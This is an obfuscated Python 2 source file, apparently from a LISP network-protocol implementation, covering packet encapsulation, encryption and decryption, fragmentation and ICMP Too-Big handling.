if 30 - 30: o0oOOo0O0Ooo - OoO0O00 + OOooOOo
if 65 - 65: O0 / II111iiii . iIii1I11I1II1 . oO0o / Oo0Ooo % iIii1I11I1II1
if 74 - 74: i1IIi / I1IiiI % I1ii11iIi11i / O0 % I11i - OoOoOO00
if ( self . outer_version == 4 ) :
Iiii = socket . htons ( self . udp_length + 20 )
oO = socket . htons ( 0x4000 )
ii11I = struct . pack ( "BBHHHBBH" , 0x45 , self . outer_tos , Iiii , 0xdfdf ,
oO , self . outer_ttl , 17 , 0 )
ii11I += self . outer_source . pack_address ( )
ii11I += self . outer_dest . pack_address ( )
ii11I = lisp_ip_checksum ( ii11I )
elif ( self . outer_version == 6 ) :
ii11I = ""
if 97 - 97: i1IIi + iII111i . ooOoO0o - iII111i
if 53 - 53: O0 . I1IiiI
if 74 - 74: ooOoO0o % OoOoOO00 / Oo0Ooo
if 2 - 2: IiII % IiII % I1Ii111
if 60 - 60: OOooOOo
if 73 - 73: ooOoO0o
if 86 - 86: OoOoOO00 . I11i / Oo0Ooo * I11i
else :
return ( None )
if 20 - 20: ooOoO0o - OOooOOo * OoO0O00 * o0oOOo0O0Ooo * OOooOOo / IiII
if 40 - 40: I1IiiI * o0oOOo0O0Ooo . I1IiiI
self . packet = ii11I + o0oOo00 + O0oooo0O + self . packet
return ( self )
if 62 - 62: ooOoO0o + II111iiii % ooOoO0o
if 50 - 50: OoooooooOO + oO0o * I1IiiI - Ii1I / i11iIiiIii
def cipher_pad ( self , packet ) :
iiiIIiiIi = len ( packet )
if ( ( iiiIIiiIi % 16 ) != 0 ) :
Oooo0oOooOO = ( ( iiiIIiiIi / 16 ) + 1 ) * 16
packet = packet . ljust ( Oooo0oOooOO )
if 82 - 82: ooOoO0o + II111iiii . I1IiiI / I1ii11iIi11i
return ( packet )
if 68 - 68: OOooOOo - OoooooooOO
if 14 - 14: O0 / oO0o - Oo0Ooo - IiII
def encrypt ( self , key , addr_str ) :
if ( key == None or key . shared_key == None ) :
return ( [ self . packet , False ] )
if 44 - 44: OoO0O00
if 32 - 32: OoOoOO00 % OoO0O00 + i11iIiiIii + ooOoO0o - Ii1I + oO0o
if 31 - 31: iIii1I11I1II1 - o0oOOo0O0Ooo
if 57 - 57: Oo0Ooo % OoO0O00
if 1 - 1: OoOoOO00 * O0 . oO0o % O0 + II111iiii
IIii1i = self . cipher_pad ( self . packet )
i1Oo = key . get_iv ( )
if 15 - 15: i1IIi + IiII % I1IiiI / i11iIiiIii * OoOoOO00
Oo0OO0000oooo = lisp_get_timestamp ( )
oOiI1I = None
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
i111I1 = chacha . ChaCha ( key . encrypt_key , i1Oo ) . encrypt
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
OOOo0Oo0O = binascii . unhexlify ( key . encrypt_key )
try :
i1I1I1iIIi = AES . new ( OOOo0Oo0O , AES . MODE_GCM , i1Oo )
i111I1 = i1I1I1iIIi . encrypt
oOiI1I = i1I1I1iIIi . digest
except :
lprint ( "You need AES-GCM, do a 'pip install pycryptodome'" )
return ( [ self . packet , False ] )
if 46 - 46: I1IiiI . IiII - i11iIiiIii - I1Ii111
else :
OOOo0Oo0O = binascii . unhexlify ( key . encrypt_key )
i111I1 = AES . new ( OOOo0Oo0O , AES . MODE_CBC , i1Oo ) . encrypt
if 97 - 97: II111iiii % Oo0Ooo * IiII
if 51 - 51: Oo0Ooo % OOooOOo . Oo0Ooo
o0o0oO0OOO = i111I1 ( IIii1i )
if 66 - 66: Ii1I * iIii1I11I1II1 - ooOoO0o / I1IiiI
if ( o0o0oO0OOO == None ) : return ( [ self . packet , False ] )
Oo0OO0000oooo = int ( str ( time . time ( ) - Oo0OO0000oooo ) . split ( "." ) [ 1 ] [ 0 : 6 ] )
if 62 - 62: IiII . O0 . iIii1I11I1II1
if 94 - 94: ooOoO0o % I11i % i1IIi
if 90 - 90: Ii1I * OoO0O00
if 7 - 7: iII111i . Ii1I . iII111i - I1Ii111
if 33 - 33: ooOoO0o + OoooooooOO - OoO0O00 / i1IIi / OoooooooOO
if 82 - 82: I1ii11iIi11i / OOooOOo - iII111i / Oo0Ooo * OoO0O00
if ( oOiI1I != None ) : o0o0oO0OOO += oOiI1I ( )
if 55 - 55: OoooooooOO
if 73 - 73: OoOoOO00 - I1ii11iIi11i % Oo0Ooo + I1ii11iIi11i - O0 . OoO0O00
if 38 - 38: O0
if 79 - 79: i1IIi . oO0o
if 34 - 34: I1Ii111 * II111iiii
self . lisp_header . key_id ( key . key_id )
O0oooo0O = self . lisp_header . encode ( )
if 71 - 71: IiII
o00OOo0o = key . do_icv ( O0oooo0O + i1Oo + o0o0oO0OOO , i1Oo )
if 48 - 48: i11iIiiIii / II111iiii + Ii1I + o0oOOo0O0Ooo . I1Ii111 % OOooOOo
o0 = 4 if ( key . do_poly ) else 8
if 91 - 91: i11iIiiIii % I1Ii111 * oO0o - I1ii11iIi11i . I1Ii111
iI = bold ( "Encrypt" , False )
o00ooO000Oo00 = bold ( key . cipher_suite_string , False )
addr_str = "RLOC: " + red ( addr_str , False )
iI1 = "poly" if key . do_poly else "sha256"
iI1 = bold ( iI1 , False )
oOoo = "ICV({}): 0x{}...{}" . format ( iI1 , o00OOo0o [ 0 : o0 ] , o00OOo0o [ - o0 : : ] )
dprint ( "{} for key-id: {}, {}, {}, {}-time: {} usec" . format ( iI , key . key_id , addr_str , oOoo , o00ooO000Oo00 , Oo0OO0000oooo ) )
if 59 - 59: IiII % Ii1I
if 57 - 57: I11i . O0 % OoooooooOO . I1IiiI . i1IIi - II111iiii
o00OOo0o = int ( o00OOo0o , 16 )
if ( key . do_poly ) :
ooooO0o000oOO = byte_swap_64 ( ( o00OOo0o >> 64 ) & LISP_8_64_MASK )
Ii11Iiii = byte_swap_64 ( o00OOo0o & LISP_8_64_MASK )
o00OOo0o = struct . pack ( "QQ" , ooooO0o000oOO , Ii11Iiii )
else :
ooooO0o000oOO = byte_swap_64 ( ( o00OOo0o >> 96 ) & LISP_8_64_MASK )
Ii11Iiii = byte_swap_64 ( ( o00OOo0o >> 32 ) & LISP_8_64_MASK )
ooO0o00OOo = socket . htonl ( o00OOo0o & 0xffffffff )
o00OOo0o = struct . pack ( "QQI" , ooooO0o000oOO , Ii11Iiii , ooO0o00OOo )
if 50 - 50: II111iiii
if 39 - 39: II111iiii . OoOoOO00 - Oo0Ooo * i1IIi . OoooooooOO
return ( [ i1Oo + o0o0oO0OOO + o00OOo0o , True ] )
if 44 - 44: I1IiiI
if 55 - 55: oO0o . I1Ii111 * I1Ii111
def decrypt ( self , packet , header_length , key , addr_str ) :
if 82 - 82: I1IiiI % OoO0O00 % I11i + I11i
if 6 - 6: Oo0Ooo
if 73 - 73: I1Ii111 * I1ii11iIi11i + o0oOOo0O0Ooo - Oo0Ooo . I11i
if 93 - 93: i11iIiiIii
if 80 - 80: i1IIi . I1IiiI - oO0o + OOooOOo + iII111i % oO0o
if 13 - 13: II111iiii / OoOoOO00 / OoOoOO00 + ooOoO0o
if ( key . do_poly ) :
ooooO0o000oOO , Ii11Iiii = struct . unpack ( "QQ" , packet [ - 16 : : ] )
Ii1i = byte_swap_64 ( ooooO0o000oOO ) << 64
Ii1i |= byte_swap_64 ( Ii11Iiii )
Ii1i = lisp_hex_string ( Ii1i ) . zfill ( 32 )
packet = packet [ 0 : - 16 ]
o0 = 4
ooooOoOooo00Oo = bold ( "poly" , False )
else :
ooooO0o000oOO , Ii11Iiii , ooO0o00OOo = struct . unpack ( "QQI" , packet [ - 20 : : ] )
Ii1i = byte_swap_64 ( ooooO0o000oOO ) << 96
Ii1i |= byte_swap_64 ( Ii11Iiii ) << 32
Ii1i |= socket . htonl ( ooO0o00OOo )
Ii1i = lisp_hex_string ( Ii1i ) . zfill ( 40 )
packet = packet [ 0 : - 20 ]
o0 = 8
ooooOoOooo00Oo = bold ( "sha" , False )
if 72 - 72: I11i
O0oooo0O = self . lisp_header . encode ( )
if 26 - 26: IiII % Oo0Ooo
if 72 - 72: O0 + o0oOOo0O0Ooo + I1IiiI / Oo0Ooo
if 83 - 83: IiII - I1IiiI . Ii1I
if 34 - 34: OoOoOO00 - oO0o * OoooooooOO
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
IiI1I1IIIi1i = 8
o00ooO000Oo00 = bold ( "chacha" , False )
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
IiI1I1IIIi1i = 12
o00ooO000Oo00 = bold ( "aes-gcm" , False )
else :
IiI1I1IIIi1i = 16
o00ooO000Oo00 = bold ( "aes-cbc" , False )
if 73 - 73: O0 * I1Ii111 . i1IIi
i1Oo = packet [ 0 : IiI1I1IIIi1i ]
if 51 - 51: OoO0O00 - iII111i % O0 - OoOoOO00
if 53 - 53: iII111i / i1IIi / i1IIi
if 77 - 77: I11i + i1IIi . I11i
if 89 - 89: o0oOOo0O0Ooo + OOooOOo * oO0o
i1iI1IIi = key . do_icv ( O0oooo0O + packet , i1Oo )
if 27 - 27: O0 / OoO0O00
O000oooO0 = "0x{}...{}" . format ( Ii1i [ 0 : o0 ] , Ii1i [ - o0 : : ] )
oOO00 = "0x{}...{}" . format ( i1iI1IIi [ 0 : o0 ] , i1iI1IIi [ - o0 : : ] )
if 91 - 91: I1ii11iIi11i + iIii1I11I1II1 % IiII
if ( i1iI1IIi != Ii1i ) :
self . packet_error = "ICV-error"
O0o0OOOO0 = o00ooO000Oo00 + "/" + ooooOoOooo00Oo
ii1 = bold ( "ICV failed ({})" . format ( O0o0OOOO0 ) , False )
oOoo = "packet-ICV {} != computed-ICV {}" . format ( O000oooO0 , oOO00 )
dprint ( ( "{} from RLOC {}, receive-port: {}, key-id: {}, " + "packet dropped, {}" ) . format ( ii1 , red ( addr_str , False ) ,
# O0 * I1ii11iIi11i * oO0o + OoO0O00 + I1ii11iIi11i - I1Ii111
self . udp_sport , key . key_id , oOoo ) )
dprint ( "{}" . format ( key . print_keys ( ) ) )
if 10 - 10: I1ii11iIi11i + IiII
if 58 - 58: I1IiiI + OoooooooOO / iII111i . ooOoO0o % o0oOOo0O0Ooo / I1ii11iIi11i
if 62 - 62: II111iiii
if 12 - 12: IiII + II111iiii
if 92 - 92: I1Ii111 % iIii1I11I1II1 - iII111i / i11iIiiIii % ooOoO0o * o0oOOo0O0Ooo
if 80 - 80: iII111i
lisp_retry_decap_keys ( addr_str , O0oooo0O + packet , i1Oo , Ii1i )
return ( [ None , False ] )
if 3 - 3: I1ii11iIi11i * I11i
if 53 - 53: iIii1I11I1II1 / iII111i % OoO0O00 + IiII / ooOoO0o
if 74 - 74: Oo0Ooo
if 8 - 8: I1IiiI % II111iiii - o0oOOo0O0Ooo - I11i % I1IiiI
if 93 - 93: Ii1I * iII111i / OOooOOo
packet = packet [ IiI1I1IIIi1i : : ]
if 88 - 88: oO0o
if 1 - 1: Oo0Ooo
if 95 - 95: OoooooooOO / I11i % OoooooooOO / ooOoO0o * IiII
if 75 - 75: O0
Oo0OO0000oooo = lisp_get_timestamp ( )
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
oOoO = chacha . ChaCha ( key . encrypt_key , i1Oo ) . decrypt
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
OOOo0Oo0O = binascii . unhexlify ( key . encrypt_key )
try :
oOoO = AES . new ( OOOo0Oo0O , AES . MODE_GCM , i1Oo ) . decrypt
except :
self . packet_error = "no-decrypt-key"
lprint ( "You need AES-GCM, do a 'pip install pycryptodome'" )
return ( [ None , False ] )
if 59 - 59: OOooOOo + I1IiiI / II111iiii / OoOoOO00
else :
if ( ( len ( packet ) % 16 ) != 0 ) :
dprint ( "Ciphertext not multiple of 16 bytes, packet dropped" )
return ( [ None , False ] )
if 80 - 80: OoOoOO00 + iIii1I11I1II1 . IiII
OOOo0Oo0O = binascii . unhexlify ( key . encrypt_key )
oOoO = AES . new ( OOOo0Oo0O , AES . MODE_CBC , i1Oo ) . decrypt
if 76 - 76: I1IiiI * OOooOOo
if 12 - 12: iIii1I11I1II1 / I11i % Ii1I
IIiiI11 = oOoO ( packet )
Oo0OO0000oooo = int ( str ( time . time ( ) - Oo0OO0000oooo ) . split ( "." ) [ 1 ] [ 0 : 6 ] )
if 7 - 7: I1IiiI / OoO0O00 + I1Ii111 + I11i / I1IiiI
if 82 - 82: I1ii11iIi11i + OoooooooOO
if 21 - 21: oO0o * oO0o / I11i . iII111i
if 10 - 10: Ii1I * OOooOOo - Oo0Ooo - OoooooooOO / o0oOOo0O0Ooo
iI = bold ( "Decrypt" , False )
addr_str = "RLOC: " + red ( addr_str , False )
iI1 = "poly" if key . do_poly else "sha256"
iI1 = bold ( iI1 , False )
oOoo = "ICV({}): {}" . format ( iI1 , O000oooO0 )
dprint ( "{} for key-id: {}, {}, {} (good), {}-time: {} usec" . format ( iI , key . key_id , addr_str , oOoo , o00ooO000Oo00 , Oo0OO0000oooo ) )
if 86 - 86: I1Ii111 % I1IiiI
if 22 - 22: i11iIiiIii * I1Ii111 . Oo0Ooo . OoooooooOO + I1IiiI
if 24 - 24: II111iiii / Ii1I . iIii1I11I1II1 - II111iiii % O0
if 8 - 8: OoO0O00 % iII111i . OoooooooOO - Ii1I % OoooooooOO
if 61 - 61: o0oOOo0O0Ooo / i11iIiiIii
if 28 - 28: OOooOOo / OoOoOO00
if 30 - 30: ooOoO0o
self . packet = self . packet [ 0 : header_length ]
return ( [ IIiiI11 , True ] )
if 57 - 57: o0oOOo0O0Ooo * i11iIiiIii / OoOoOO00
if 40 - 40: iIii1I11I1II1 - ooOoO0o / Oo0Ooo
def fragment_outer ( self , outer_hdr , inner_packet ) :
iIi11ii1 = 1000
if 49 - 49: oO0o . OoOoOO00
if 73 - 73: Ii1I / I1IiiI / OoooooooOO + I1IiiI
if 57 - 57: OOooOOo . Ii1I % o0oOOo0O0Ooo
if 32 - 32: I11i / IiII - O0 * iIii1I11I1II1
if 70 - 70: OoooooooOO % OoooooooOO % OoO0O00
oo0O0OO = [ ]
OoO00oo00 = 0
iiiIIiiIi = len ( inner_packet )
while ( OoO00oo00 < iiiIIiiIi ) :
oO = inner_packet [ OoO00oo00 : : ]
if ( len ( oO ) > iIi11ii1 ) : oO = oO [ 0 : iIi11ii1 ]
oo0O0OO . append ( oO )
OoO00oo00 += len ( oO )
if 30 - 30: I1Ii111 / o0oOOo0O0Ooo % oO0o
if 38 - 38: o0oOOo0O0Ooo . oO0o / o0oOOo0O0Ooo % II111iiii
if 47 - 47: I11i * iIii1I11I1II1 * iII111i - OoO0O00 . O0 . ooOoO0o
if 32 - 32: o0oOOo0O0Ooo % I1IiiI
if 7 - 7: Oo0Ooo . i1IIi - oO0o
if 93 - 93: IiII % I1ii11iIi11i
IiIIii = [ ]
OoO00oo00 = 0
for oO in oo0O0OO :
if 74 - 74: iIii1I11I1II1 / Ii1I
if 59 - 59: Ii1I / II111iiii - IiII % OoOoOO00 % OoooooooOO
if 79 - 79: iII111i . OoooooooOO . I1IiiI * O0 * OoO0O00 - OOooOOo
if 33 - 33: I1ii11iIi11i . Oo0Ooo + I1IiiI + o0oOOo0O0Ooo
O00000OO00OO = OoO00oo00 if ( oO == oo0O0OO [ - 1 ] ) else 0x2000 + OoO00oo00
O00000OO00OO = socket . htons ( O00000OO00OO )
outer_hdr = outer_hdr [ 0 : 6 ] + struct . pack ( "H" , O00000OO00OO ) + outer_hdr [ 8 : : ]
if 35 - 35: Oo0Ooo
if 47 - 47: i1IIi % ooOoO0o - Oo0Ooo * I11i / i11iIiiIii
if 45 - 45: I1IiiI . Oo0Ooo . I1Ii111 / oO0o
if 4 - 4: i11iIiiIii + OOooOOo
I1111III111ii = socket . htons ( len ( oO ) + 20 )
outer_hdr = outer_hdr [ 0 : 2 ] + struct . pack ( "H" , I1111III111ii ) + outer_hdr [ 4 : : ]
outer_hdr = lisp_ip_checksum ( outer_hdr )
IiIIii . append ( outer_hdr + oO )
OoO00oo00 += len ( oO ) / 8
if 90 - 90: I11i
return ( IiIIii )
if 88 - 88: OoO0O00
if 85 - 85: oO0o
def send_icmp_too_big ( self , inner_packet ) :
global lisp_last_icmp_too_big_sent
global lisp_icmp_raw_socket
if 7 - 7: o0oOOo0O0Ooo
oO000o0Oo00 = time . time ( ) - lisp_last_icmp_too_big_sent
if ( oO000o0Oo00 < LISP_ICMP_TOO_BIG_RATE_LIMIT ) :
lprint ( "Rate limit sending ICMP Too-Big to {}" . format ( self . inner_source . print_address_no_iid ( ) ) )
if 99 - 99: i11iIiiIii - iII111i
return ( False )
if 85 - 85: I1Ii111 % I1ii11iIi11i
if 95 - 95: OoO0O00 * OOooOOo * iII111i . o0oOOo0O0Ooo
if 73 - 73: OoO0O00
if 28 - 28: OoooooooOO - I11i
if 84 - 84: II111iiii
if 36 - 36: OOooOOo - OoOoOO00 - iIii1I11I1II1
if 10 - 10: I1ii11iIi11i / Ii1I * i1IIi % O0 + I11i
if 25 - 25: I1Ii111 - Ii1I / O0 . OoooooooOO % I1IiiI . i1IIi
if 19 - 19: II111iiii / II111iiii % I1ii11iIi11i + oO0o + oO0o + iII111i
if 4 - 4: o0oOOo0O0Ooo + I11i / iII111i + i1IIi % o0oOOo0O0Ooo % iII111i
if 80 - 80: Ii1I
if 26 - 26: iIii1I11I1II1 . OoooooooOO - iIii1I11I1II1
if 59 - 59: I1ii11iIi11i + I11i . oO0o
if 87 - 87: OoO0O00
if 34 - 34: I1Ii111 . OoOoOO00 / i11iIiiIii / iII111i
II1iII1 = socket . htons ( 1400 )
O00ooooo00 = struct . pack ( "BBHHH" , 3 , 4 , 0 , 0 , II1iII1 )
O00ooooo00 += inner_packet [ 0 : 20 + 8 ]
O00ooooo00 = lisp_icmp_checksum ( O00ooooo00 )
if 31 - 31: Ii1I * o0oOOo0O0Ooo * Ii1I + OoO0O00 * o0oOOo0O0Ooo . I1Ii111
if 89 - 89: OoooooooOO * Ii1I * I1IiiI . ooOoO0o * Ii1I / iII111i
if 46 - 46: i11iIiiIii
if 15 - 15: O0 / i1IIi / i1IIi . iII111i % OoOoOO00 + I1IiiI
if 48 - 48: I1Ii111 % iII111i % Ii1I % iIii1I11I1II1 . Ii1I
if 14 - 14: iII111i * OoO0O00 % O0 + I11i + I1ii11iIi11i
if 23 - 23: Oo0Ooo % iII111i + Ii1I - I1Ii111
ooOO = inner_packet [ 12 : 16 ]
oO0o0 = self . inner_source . print_address_no_iid ( )
i1Ii1i11ii = self . outer_source . pack_address ( )
if 58 - 58: OoOoOO00 + OoO0O00 * Ii1I
if 31 - 31: oO0o - iII111i
if 46 - 46: I1IiiI + Oo0Ooo - Ii1I
if 99 - 99: OOooOOo + I1IiiI . I1ii11iIi11i * OoooooooOO
if 82 - 82: i11iIiiIii + iIii1I11I1II1 / Oo0Ooo + OOooOOo * II111iiii
if 34 - 34: o0oOOo0O0Ooo % OoooooooOO
if 36 - 36: I1IiiI
if 64 - 64: i11iIiiIii + i1IIi % O0 . I11i
Iiii = socket . htons ( 20 + 36 )
Ooo0oO = struct . pack ( "BBHHHBBH" , 0x45 , 0 , Iiii , 0 , 0 , 32 , 1 , 0 ) + i1Ii1i11ii + ooOO
Ooo0oO = lisp_ip_checksum ( Ooo0oO )
Ooo0oO = self . fix_outer_header ( Ooo0oO )
Ooo0oO += O00ooooo00
o00o0 = bold ( "Too-Big" , False )
lprint ( "Send ICMP {} to {}, mtu 1400: {}" . format ( o00o0 , oO0o0 ,
lisp_format_packet ( Ooo0oO ) ) )
if 84 - 84: OoOoOO00 - Oo0Ooo . ooOoO0o . IiII - Oo0Ooo
try :
lisp_icmp_raw_socket . sendto ( Ooo0oO , ( oO0o0 , 0 ) )
except socket . error , oOo :
lprint ( "lisp_icmp_raw_socket.sendto() failed: {}" . format ( oOo ) )
return ( False )
if 99 - 99: I1Ii111
if 75 - 75: ooOoO0o . OOooOOo / IiII
if 84 - 84: OoooooooOO . I1IiiI / o0oOOo0O0Ooo
if 86 - 86: Oo0Ooo % OoOoOO00
if 77 - 77: Ii1I % OOooOOo / oO0o
if 91 - 91: OoO0O00 / OoO0O00 . II111iiii . ooOoO0o - I1IiiI
lisp_last_icmp_too_big_sent = lisp_get_timestamp ( )
return ( True )
if 23 - 23: I1IiiI
def fragment ( self ) :
global lisp_icmp_raw_socket
global lisp_ignore_df_bit
if 7 - 7: iII111i % I1ii11iIi11i
IIii1i = self . fix_outer_header ( self . packet )
if 64 - 64: I1Ii111 + i11iIiiIii
if 35 - 35: OoOoOO00 + i1IIi % OOooOOo
if 68 - 68: IiII . ooOoO0o
if 64 - 64: i1IIi + Oo0Ooo * I1IiiI / OOooOOo
if 3 - 3: Oo0Ooo / ooOoO0o + ooOoO0o . I1ii11iIi11i
if 50 - 50: iIii1I11I1II1 * oO0o
iiiIIiiIi = len ( IIii1i )
if ( iiiIIiiIi <= 1500 ) : return ( [ IIii1i ] , "Fragment-None" )
if 85 - 85: i1IIi
IIii1i = self . packet
if 100 - 100: OoooooooOO / I11i % OoO0O00 + Ii1I
if 42 - 42: Oo0Ooo / IiII . Ii1I * I1IiiI
if 54 - 54: OoOoOO00 * iII111i + OoO0O00
if 93 - 93: o0oOOo0O0Ooo / I1IiiI
if 47 - 47: Oo0Ooo * OOooOOo
if ( self . inner_version != 4 ) :
oOoO0O00o = random . randint ( 0 , 0xffff )
IiI11II = IIii1i [ 0 : 4 ] + struct . pack ( "H" , oOoO0O00o ) + IIii1i [ 6 : 20 ]
OO0 = IIii1i [ 20 : : ]
IiIIii = self . fragment_outer ( IiI11II , OO0 )
return ( IiIIii , "Fragment-Outer" )
if 18 - 18: I1IiiI * IiII / OoOoOO00 / oO0o / Ii1I * ooOoO0o
if 51 - 51: oO0o
if 34 - 34: OoOoOO00 . i11iIiiIii * OOooOOo . ooOoO0o * O0 * OoO0O00
if 27 - 27: Ii1I . o0oOOo0O0Ooo - OoOoOO00 . II111iiii % Oo0Ooo
if 83 - 83: I11i + oO0o - iIii1I11I1II1 + II111iiii . iII111i
oOO0 = 56 if ( self . outer_version == 6 ) else 36
IiI11II = IIii1i [ 0 : oOO0 ]
oOooooO = IIii1i [ oOO0 : oOO0 + 20 ]
OO0 = IIii1i [ oOO0 + 20 : : ]
if 79 - 79: I1ii11iIi11i - iIii1I11I1II1 % i1IIi / Oo0Ooo + II111iiii
if 95 - 95: oO0o
if 48 - 48: I11i / iIii1I11I1II1 % II111iiii
if 39 - 39: i1IIi . I1ii11iIi11i / I11i / I11i
if 100 - 100: OoooooooOO - OoooooooOO + IiII
iIiIi1i1Iiii = struct . unpack ( "H" , oOooooO [ 6 : 8 ] ) [ 0 ]
iIiIi1i1Iiii = socket . ntohs ( iIiIi1i1Iiii )
if ( iIiIi1i1Iiii & 0x4000 ) :
if ( lisp_icmp_raw_socket != None ) :
OOO00000O = IIii1i [ oOO0 : : ]
if ( self . send_icmp_too_big ( OOO00000O ) ) : return ( [ ] , None )
if 23 - 23: Oo0Ooo - O0
if ( lisp_ignore_df_bit ) :
iIiIi1i1Iiii &= ~ 0x4000
else :
iI111iIi = bold ( "DF-bit set" , False )
dprint ( "{} in inner header, packet discarded" . format ( iI111iIi ) )
return ( [ ] , "Fragment-None-DF-bit" )
if 26 - 26: OOooOOo % OOooOOo / i11iIiiIii + I1ii11iIi11i - O0
if 20 - 20: I1Ii111 . O0 - I1ii11iIi11i / OoOoOO00 - o0oOOo0O0Ooo
if 79 - 79: OoooooooOO - iIii1I11I1II1
OoO00oo00 = 0
iiiIIiiIi = len ( OO0 )
IiIIii = [ ]
while ( OoO00oo00 < iiiIIiiIi ) :
IiIIii . append ( OO0 [ OoO00oo00 : OoO00oo00 + 1400 ] )
OoO00oo00 += 1400
if 9 - 9: i1IIi - OoOoOO00
if 57 - 57: iIii1I11I1II1 * Ii1I * iII111i / oO0o
if 46 - 46: Ii1I
if 61 - 61: o0oOOo0O0Ooo / ooOoO0o - II111iiii
if 87 - 87: I1ii11iIi11i / I1IiiI
oo0O0OO = IiIIii
IiIIii = [ ]
IIi1IiiIi1III = True if iIiIi1i1Iiii & 0x2000 else False
iIiIi1i1Iiii = ( iIiIi1i1Iiii & 0x1fff ) * 8
for oO in oo0O0OO :
if 19 - 19: i1IIi % I1IiiI - iIii1I11I1II1 - oO0o / I1ii11iIi11i
if 16 - 16: Ii1I
if 79 - 79: OoooooooOO - ooOoO0o * Ii1I - II111iiii % OoOoOO00 * IiII
if 31 - 31: I1IiiI
IIII1I1 = iIiIi1i1Iiii / 8
if ( IIi1IiiIi1III ) :
IIII1I1 |= 0x2000
elif ( oO != oo0O0OO [ - 1 ] ) :
IIII1I1 |= 0x2000
if 36 - 36: Ii1I * I11i . I11i / Oo0Ooo / I1IiiI
IIII1I1 = socket . htons ( IIII1I1 )
oOooooO = oOooooO [ 0 : 6 ] + struct . pack ( "H" , IIII1I1 ) + oOooooO [ 8 : : ]
if 80 - 80: OoooooooOO - i1IIi
if 51 - 51: i1IIi . OoOoOO00 / OoOoOO00 % i11iIiiIii * OOooOOo - I1Ii111
if 49 - 49: Oo0Ooo - iIii1I11I1II1
if 64 - 64: I1Ii111 + iIii1I11I1II1
if 14 - 14: Ii1I / OoooooooOO + II111iiii . O0 / i1IIi
if 58 - 58: o0oOOo0O0Ooo / i11iIiiIii / O0 % I11i % I1IiiI
iiiIIiiIi = len ( oO )
iIiIi1i1Iiii += iiiIIiiIi
I1111III111ii = socket . htons ( iiiIIiiIi + 20 )
oOooooO = oOooooO [ 0 : 2 ] + struct . pack ( "H" , I1111III111ii ) + oOooooO [ 4 : 10 ] + struct . pack ( "H" , 0 ) + oOooooO [ 12 : : ]
if 86 - 86: IiII + OoOoOO00 / I1IiiI + I11i % I11i / i11iIiiIii
oOooooO = lisp_ip_checksum ( oOooooO )
iIiI1I = oOooooO + oO
if 2 - 2: o0oOOo0O0Ooo . Ii1I % OoOoOO00
if 58 - 58: I1ii11iIi11i % Ii1I * Ii1I - iII111i
if 9 - 9: ooOoO0o - Ii1I % II111iiii + IiII + OOooOOo % O0
if 65 - 65: OOooOOo - OoO0O00 % i11iIiiIii
if 58 - 58: iII111i
iiiIIiiIi = len ( iIiI1I )
if ( self . outer_version == 4 ) :
I1111III111ii = iiiIIiiIi + oOO0
iiiIIiiIi += 16
IiI11II = IiI11II [ 0 : 2 ] + struct . pack ( "H" , I1111III111ii ) + IiI11II [ 4 : : ]
if 2 - 2: II111iiii + i1IIi
IiI11II = lisp_ip_checksum ( IiI11II )
iIiI1I = IiI11II + iIiI1I
iIiI1I = self . fix_outer_header ( iIiI1I )
if 68 - 68: OOooOOo + Ii1I
if 58 - 58: IiII * Ii1I . i1IIi
if 19 - 19: oO0o
if 85 - 85: ooOoO0o - I1IiiI / i1IIi / OoO0O00 / II111iiii
if 94 - 94: iIii1I11I1II1 + IiII
II11II = oOO0 - 12
I1111III111ii = socket . htons ( iiiIIiiIi )
iIiI1I = iIiI1I [ 0 : II11II ] + struct . pack ( "H" , I1111III111ii ) + iIiI1I [ II11II + 2 : : ]
if 40 - 40: iII111i + O0
IiIIii . append ( iIiI1I )
if 18 - 18: iIii1I11I1II1 % iIii1I11I1II1 % oO0o + I1IiiI % ooOoO0o / Ii1I
return ( IiIIii , "Fragment-Inner" )
if 36 - 36: OoOoOO00 . i11iIiiIii
if 81 - 81: Oo0Ooo * iII111i * OoO0O00
def fix_outer_header ( self , packet ) :
if 85 - 85: O0 * oO0o
if 39 - 39: II111iiii * I1IiiI - iIii1I11I1II1
if 25 - 25: OoooooooOO . Ii1I % iII111i . IiII
if 67 - 67: OoooooooOO + I1Ii111 / ooOoO0o
if 75 - 75: IiII / OoooooooOO . I1IiiI + I1Ii111 - II111iiii
if 33 - 33: IiII / IiII . i11iIiiIii * I1ii11iIi11i + o0oOOo0O0Ooo
if 16 - 16: IiII
if 10 - 10: OoOoOO00 . IiII * iIii1I11I1II1 - oO0o - OoOoOO00 / I1Ii111
if ( self . outer_version == 4 or self . inner_version == 4 ) :
if ( lisp_is_macos ( ) ) :
packet = packet [ 0 : 2 ] + packet [ 3 ] + packet [ 2 ] + packet [ 4 : 6 ] + packet [ 7 ] + packet [ 6 ] + packet [ 8 : : ]
if 13 - 13: oO0o + OoOoOO00 % IiII % OoooooooOO
else :
packet = packet [ 0 : 2 ] + packet [ 3 ] + packet [ 2 ] + packet [ 4 : : ]
if 22 - 22: I1Ii111
if 23 - 23: O0
return ( packet )
if 41 - 41: i1IIi . OOooOOo / ooOoO0o / o0oOOo0O0Ooo % IiII - Ii1I
if 14 - 14: I1ii11iIi11i - i11iIiiIii * I1Ii111
def send_packet ( self , lisp_raw_socket , dest ) :
if ( lisp_flow_logging and dest != self . inner_dest ) : self . log_flow ( True )
if 39 - 39: OoooooooOO
dest = dest . print_address_no_iid ( )
IiIIii , i1iIII1IIi = self . fragment ( )
if 63 - 63: II111iiii . I1Ii111 % IiII + II111iiii
for iIiI1I in IiIIii :
if ( len ( IiIIii ) != 1 ) :
self . packet = iIiI1I
self . print_packet ( i1iIII1IIi , True )
if 81 - 81: OOooOOo - I1IiiI % o0oOOo0O0Ooo
if 7 - 7: ooOoO0o - i1IIi . OoOoOO00
try : lisp_raw_socket . sendto ( iIiI1I , ( dest , 0 ) )
except socket . error , oOo :
lprint ( "socket.sendto() failed: {}" . format ( oOo ) )
if 12 - 12: IiII / OoO0O00 / O0 * IiII
if 51 - 51: ooOoO0o * iII111i / i1IIi
if 2 - 2: oO0o + IiII . iII111i - i1IIi + I1Ii111
if 54 - 54: OoooooooOO . oO0o - iII111i
def send_l2_packet ( self , l2_socket , mac_header ) :
if ( l2_socket == None ) :
lprint ( "No layer-2 socket, drop IPv6 packet" )
return
if 76 - 76: I1Ii111
if ( mac_header == None ) :
